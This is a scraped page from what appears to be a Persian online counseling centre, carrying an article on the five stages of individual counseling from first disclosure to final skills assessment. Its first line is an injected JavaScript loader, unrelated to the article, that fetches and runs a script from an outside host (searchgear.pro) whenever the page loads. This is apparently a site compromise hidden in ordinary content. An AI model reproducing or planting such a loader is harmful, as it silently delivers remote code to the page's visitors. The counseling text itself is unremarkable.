;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); صفر تا صد مراحل مشاوره فردی از شروع تا درمان | مرکز مشاوره آنلاین روان‌یاری
صفر تا صد مراحل مشاوره فردي از شروع تا درمان

صفر تا صد مراحل مشاوره فردی از شروع تا درمان

میزان پیشرفت خواندن شما

فهرست مطالب

در دنیای شلوغ و پر مشغله امروز، مشاوره راه‌حل تأثیرگذاری است که می‌تواند به ما کمک کند تا مهارت زندگی کردن و مقابله با مشکلات را بیاموزیم. در حال‌ حاضر شما به‌ عنوان متقاضی می‌توانید از خدمات مشاوره در زیر شاخه‌های گوناگونی مانند مشاوره فردی، مشاوره قبل ‌از ازدواج، مشاوره خانواده و … بهره ببرید. ما در این مقاله قصد داریم برای شما به‌ صورت به‌ خصوص در رابطه با مشاوره فردی از شروع تا درمان صحبت کنیم. مشاوره فردی مشاوره‌ای است که به شما کمک می‌کند با شناخت احساسات، رفتار و هیجانات، کنترل بهتری روی زندگی خودتان داشته باشید و بتوانید در شرایط حساس تصمیمات عاقلانه‌ای را اتخاذ کنید.

معمولاً در مشاوره فردی، خاطرات و تجربیات تأثیرگذار در زندگی افراد بررسی می‌شوند تا با کنکاش تأثیر آن ‌ها در زندگی افراد، تعیین شود که باید از چه اقداماتی برای بهبود تأثیر این چالش‌ها در زندگی افراد بهره برد. اگر قصد دارید که با استفاده از مشاوره فردی آرامش بیشتری را تجربه کنید، به شما پیشنهاد می‌کنیم ما را تا انتهای این محتوا همراهی کنید. ما در ادامه مراحل مشاوره فردی را برای شما نام‌ برده‌ایم و راهنمای شما در زمینه استفاده از این خدمات هستیم.

مرحله اول مشاوره فردی، افشای اولیه

مرحله اول از مشاوره فردی از شروع تا درمان شامل افشای اولیه می‌شود. می‌توان گفت که برای اولین ‌بار صحبت در رابطه با یک موضوع یا یک معضل برای بسیاری از افراد سخت است. این‌ که ناراحتی که برای هیچ‌ کس بیان نکرده‌ایم را برای اولین ‌بار برای فرد مشاور بیان کنیم، یکی از چالش برانگیزترین قسمت‌های مشاوره است. در این مرحله، متقاضی و بیمار باید سعی کند که تمامی مشکلات خودش را برای متخصص شرح دهد. معمولاً متخصص سعی می‌کند که با ایجاد یک رابطه قوی که روی اعتماد پایه ‌گذاری شده، بیمار را متقاعد کند که با صداقت کامل مشکلاتش را بیان کند. به‌ طور کلی، ایجاد یک رابطه‌ی سالم در مرحله اول مشاوره فردی از شروع تا درمان به‌ عنوان یکی از اهداف اصلی این مرحله شناخته می‌شود. ایجاد یک رابطه سالم و توجه به اصولی مانند همدلی، درک متقابل، اعتماد، و … جزو آن دسته از فاکتورهایی هستند که پایه‌های اصلی این مرحله را می‌سازند.

کشف مشکل فرد مراجعه‌کننده در لایه‌های عمیق‌تر

مرحله دوم، کشف مشکل فرد مراجعه‌کننده در لایه‌های عمیق‌تر

هنگامی ‌که صحبت از مشاوره فردی از شروع تا درمان میشود، مهم‌ترین فاکتور تأثیرگذار در شرایط روحی افراد، تجربیات تلخ و شیرین گذشته است. دقیقاً به‌ همین دلیل است که در این مرحله فرد متخصص باید تلاش کند تا به شکل عمیق در گذشته فرد کنکاش کند تا متوجه شود که دلیل اصلی مشکل و ناراحتی ایجاد شده در بیمار چیست. در واقع می‌توان گفت که اگر تشخیص ریشه مشکل در این مرحله به ‌درستی انجام نگیرد، روند درمان با مشکل زیادی مواجه خواهد شد. دقیقاً به ‌همین دلیل است که بیماران در مرحله اولیه با بیان صادقانه مشکلات و ناراحتی‌ها و پاسخ به سوالات متخصص، راه را برای پزشک باز می‌کنند تا به ‌صورت علمی و تخصصی لایه‌های عمیق و ریشه‌ای مشکلات را پیدا کند و با توجه به دلیل اصلی ایجاد مشکل، به ‌دنبال راه‌حل بگردد.

  یک روانشناس خوب چه ویژگی هایی دارد؟

در واقع می‌توان گفت مشاور متخصص باید سعی کند که با استراتژی‌های درست بیمار را به سمت درمان هدایت کند. به این نکته توجه داشته باشید که کشف گذشته به ‌صورت درست و دقیق، هم به تخصص پزشک وابسته است و هم صداقت کامل مراجعه‌کننده را می‌طلبد. پس اگر قصد دارید که با استفاده از خدمات مشاوره و شروع درمان به هدف خود برسید و آرامش در زندگی خود تجربه کنید، به ‌عنوان بیمار سعی کنید که صداقت کاملی در مراحل نام ‌برده شده داشته باشید. به این نکته توجه کنید که این مرحله هیچ شباهتی به بازجویی ندارد؛ بلکه روندی است که باعث می‌شود تا پزشک و بیمار ارتباط سازنده‌ای داشته باشند و بیمار با احساس این‌ که فرد مقابلش تنها قصد دارد او را بیشتر بشناسد، اطلاعات مورد نیاز را در اختیار او قرار می‌دهد. 

 

استفاده از استراتژی مناسب جهت درمان

مرحله سوم مشاوره فردی، تعهد به عمل یا هدف‌گذاری برای درمان مشکلات موجود

بعد از کنکاش دقیق در گذشته افراد، نوبت به مرحله سوم مشاوره فردی از شروع تا درمان، یعنی تعهد به عمل یا هدف‌گذاری می‌رسد. بعد از این‌ مشکل موجود مشخص شد و با توجه به گذشته‌ی فرد و شخصیت او، تعیین شد که مسیر درمان کدام است، تعهد به هدف‌گذاری صورت می‌گیرد. همواره هدف‌گذاری‌های کوچک شما را در رسیدن به هدف بزرگ‌تر و هدف نهایی کمک می‌کنند. در این مرحله مشاور و متخصص سعی می‌کند تا با ارزیابی بیمار، تشخیص دهد که هدف‌گذاری‌های کوچک باید چگونه باشند تا بتوانند فرد را به هدف بزرگ‌تر برسانند. این مرحله، مرحله بسیار حساسی زیرا هرگونه عدم تخصص و بی‌دقتی ممکن است که بیمار را از مسیر اصلی دور کند.

می‌توان گفت که در این مرحله، سعی می‌شود که برنامه زندگی فرد بیمار طوری پایه‌ریزی شود که در جهت رسیدن به اهداف کوچک‌تر و در نهایت هدف بزرگ باشد. هر جلسه هدف‌گذاری می‌شود تا تعیین شود که قرار است که به کدامیک از اهداف کوچک رسیدگی شود. 

مرحله چهارم، استفاده از استراتژی مناسب جهت درمان

هنگامی‌ که اهداف کوچک پایه‌ریزی شدند و همچنین هدف بزرگ نیز مشخص شد، حال به یک استراتژی و قالب کلی برای حرکت در این مسیر نیاز است. هر مشاوری سعی می‌کند با توجه به ویژگی‌ها و هیجانات بیمار، از استراتژی‌های گوناگون و متفاوتی برای درمان فرد استفاده کند. معمولاً متخصصان در این زمینه برای تعیین استراتژی سه مرحله بررسی خلاصه مشکل، مشخص کردن مسیر بر اساس خلاصه و همچنین شروع اجرای آن را پیش می‌گیرند. در مرحله اول یعنی بیان و بررسی خلاصه مشکل، با استفاده از پارامتر های عاطفی، شناختی، رفتاری و بین فردی و سیستمی، تعیین می‌شود که استراتژی باید چگونه باشد. برای مثال اگر یکی از این پارامترها از دیگر آن‌ها بولد‌تر و پررنگ‌تر باشد، قاعدتاً مشخص می‌شود که استراتژی تعیین‌ شده باید آن بخش بخصوص را بیشتر در بر بگیرد تا شانس موفقیت بالا برود.

مراحل مشاوره فردی

مرحله پنجم مشاوره فردی، ارزیابی مهارت‌های فرد مراجعه‌کننده

در مرحله نهایی فرد متخصص باید تعیین کند که آیا مراجعه‌کننده و بیمار توانایی این را دارد که با استفاده از استراتژی موجود و روش به‌ کار گرفته شده، روند درمان را پیش ببرد. این مرحله از مشاوره فردی از شروع تا درمان، به پزشک کمک می‌کند تا یک شناخت جامع و کلی در رابطه با فرد مذکور داشته باشد. به‌ هر حال از زمان شروع جلسات مشاوره، هم بیمار و هم پزشک می‌دانند که روزی این جلسات خاتمه پیدا خواهند کرد و از آن زمان به بعد این مهارت‌های فردی بیمار هستند که می‌توانند به او کمک کنند شخصیت درمان شده خودش را حفظ کند.

  تفاوت روانشناسی و مشاوره روانشناسی چیست؟

البته این موضوع به این معنی نیست که پزشک هیچ کمکی در انتها نمی‌کند و فرد بیمار به حال خودش رها می‌کند. معمولاً در جلسات پایانی ممکن است که جداول زمانی تعیین شوند که در این جداول توصیه ‌های مفید، ارجاع‌های تأثیرگذار و … به بیمار ارائه داده می‌شوند تا او بتواند در ادامه راحت‌تر شخصیت درمان شده خودش را نگه‌دارد. البته به این موضوع توجه داشته باشید که هر چه استراتژی تعیین ‌شده برای درمان بیمار درست‌تر و تخصصی‌تر باشد، در انتها نیز روند ارزیابی مهارت‌ها راحت‌تر پیش خواهد رفت و بیمار می‌تواند راحت‌تر به زندگی ادامه دهد.

بعد از پایان مراحل مشاوره فردی از شروع تا درمان، چه اتفاقی می‌افتد؟

شاید بسیاری از افرادی که از خدمات روان‌شناسی استفاده میکنند، این سؤال را از خودشان بپرسند که بعد از پایان یافتن جلسات، چه اتفاقی قرار است بیفتد. بسیاری از بیماران، تصور می‌کنند که کار مشاوران این است که به ‌افراد بگویند که باید چگونه رفتار کنند. اما این تصور کاملاً اشتباه است. نتیجه‌ای که در انتهای جلسات مشاوره فردی بدست خواهد آمد توانمندسازی بیمار برای تشخیص خوب و بد و پیدا کردن راه‌حل‌های بهینه و مناسب می‌باشد. یعنی بعد از اتمام مراحل مشاوره فردی از شروع تا درمان، فرد بیمار با توجه به هیجانات و خلقیات خودش یاد می‌گیرد که چگونه باید رفتار کند و چه سبک زندگی برای او بهترین گزینه است. در واقع مشاوره فردی به بیمار کمک می‌کند تا خوب فکر کند تصمیماتی را بگیرد تا بتواند لذت بیشتری در زندگی‌اش تجربه کند.

جمع‌بندی

ما در این محتوا، سعی کردیم که به ‌طور کامل برای شما در رابطه با صفر تا صد مراحل مشاوره فردی از شروع تا درمان صحبت کنیم. به این نکته توجه داشته باشید که هرگاه حس کردید اختلال یا پریشانی در زندگی‌ شما به‌ وجود آمده، مطمئن باشید که می‌توانید با استفاده از خدمات مشاوره آنلاین و حضوری در جهت برطرف کردن آن مشکل اقدامات لازم را انجام دهید. تنها نکته‌ای که باید به آن توجه داشته باشید این است که سعی کنید برای استفاده از این خدمات به سراغ پزشکان متخصصی بروید که در زمینه فعالیتشان از تجربه کافی برخوردارند.

در این شرایط شانس موفقیت درمان شما تا حد بسیار زیادی بالا می‌رود و شما نیز می‌توانید سریع‌تر به اهدافتان دست پیدا کنید. همه ما انسان‌ ها لیاقت یک زندگی شاد بی دغدغه را داریم. پس اجازه ندهید که فاکتورهایی مانند ترس از مراجعه به مشاور و … لذت زندگی شاد را از شما بگیرد.

4/5 - (3 امتیاز)

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.